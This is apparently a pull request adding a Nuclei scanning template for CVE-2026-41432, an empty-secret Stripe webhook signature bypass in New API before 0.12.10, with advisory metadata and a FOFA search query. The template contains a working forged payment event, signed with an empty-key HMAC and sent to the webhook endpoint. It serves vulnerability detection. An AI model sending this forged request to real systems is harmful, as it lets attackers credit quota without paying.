### PR TITLE
Add CVE-2026-41432 template

### DIFF
--- a/http/cves/2026/CVE-2026-41432.yaml
+++ b/http/cves/2026/CVE-2026-41432.yaml
@@ -21,6 +21,7 @@ info:
   metadata:
     max-request: 1
     verified: true
+    fofa-query: 'icon_hash=="-1398762159"'
   tags: cve,cve2026,new-api,stripe,webhook,auth-bypass
 
 variables:

--- a/http/cves/2026/CVE-2026-41432.yaml
+++ b/http/cves/2026/CVE-2026-41432.yaml
@@ -1,0 +1,40 @@
+id: CVE-2026-41432
+
+info:
+  name: New API Stripe Webhook Empty-Secret Signature Bypass (CVE-2026-41432)
+  author: str4k3r
+  severity: high
+  description: >
+    New API versions before 0.12.10 accept a Stripe webhook signed with an
+    empty secret. The forged checkout.session.completed event reaches the
+    unauthenticated handler, while the fixed handler rejects an empty secret.
+    The request computes a fresh empty-key HMAC at scan time.
+  reference:
+    - https://github.com/advisories/GHSA-xff3-5c9p-2mr4
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-41432
+  classification:
+    cve-id: CVE-2026-41432
+    cwe-id: CWE-345
+  metadata:
+    max-request: 1
+    verified: true
+  tags: cve,cve2026,new-api,stripe,webhook,auth-bypass
+
+variables:
+  timestamp: "{{unix_time()}}"
+  event_body: '{"type":"checkout.session.completed","data":{"object":{"client_reference_id":"nuclei-probe","status":"complete","payment_status":"paid","customer":"cus_probe","amount_total":0,"currency":"usd"}}}'
+  signature: '{{hmac("sha256", concat(timestamp, ".", event_body), "")}}'
+
+http:
+  - raw:
+      - |-
+        POST /api/stripe/webhook HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Stripe-Signature: t={{timestamp}},v1={{signature}}
+
+        {{event_body}}
+    matchers:
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-41432.yaml
+++ b/http/cves/2026/CVE-2026-41432.yaml
@@ -1,18 +1,21 @@
 id: CVE-2026-41432
 
 info:
-  name: New API Stripe Webhook Empty-Secret Signature Bypass (CVE-2026-41432)
+  name: New API < v0.12.10 - Stripe Webhook Bypass
   author: str4k3r
   severity: high
-  description: >
-    New API versions before 0.12.10 accept a Stripe webhook signed with an
-    empty secret. The forged checkout.session.completed event reaches the
-    unauthenticated handler, while the fixed handler rejects an empty secret.
-    The request computes a fresh empty-key HMAC at scan time.
+  description: |
+    New API < v0.12.10 contains a broken authentication caused by unauthenticated attacker forging Stripe webhook events, letting attackers credit arbitrary quota without payment, exploit requires no authentication.
+  impact: |
+    Unauthenticated attackers can credit arbitrary quota to their account without payment, causing financial and resource abuse.
+  remediation: |
+    Update to version 0.12.10 or later.
   reference:
     - https://github.com/advisories/GHSA-xff3-5c9p-2mr4
     - https://nvd.nist.gov/vuln/detail/CVE-2026-41432
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
+    cvss-score: 7.1
     cve-id: CVE-2026-41432
     cwe-id: CWE-345
   metadata:
@@ -34,7 +37,11 @@ http:
         Stripe-Signature: t={{timestamp}},v1={{signature}}
 
         {{event_body}}
+
     matchers:
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(tolower(body), "webhook handled", "\"success\"", "\"status\":\"success\"")'
+          - '!contains_any(tolower(body), "<html", "not found", "error", "forbidden", "unauthorized", "invalid signature")'
+        condition: and


### PR DESCRIPTION
Adds the Nuclei template for **CVE-2026-41432** as an ecosystem contribution.
The template follows the repository format and references the public advisory.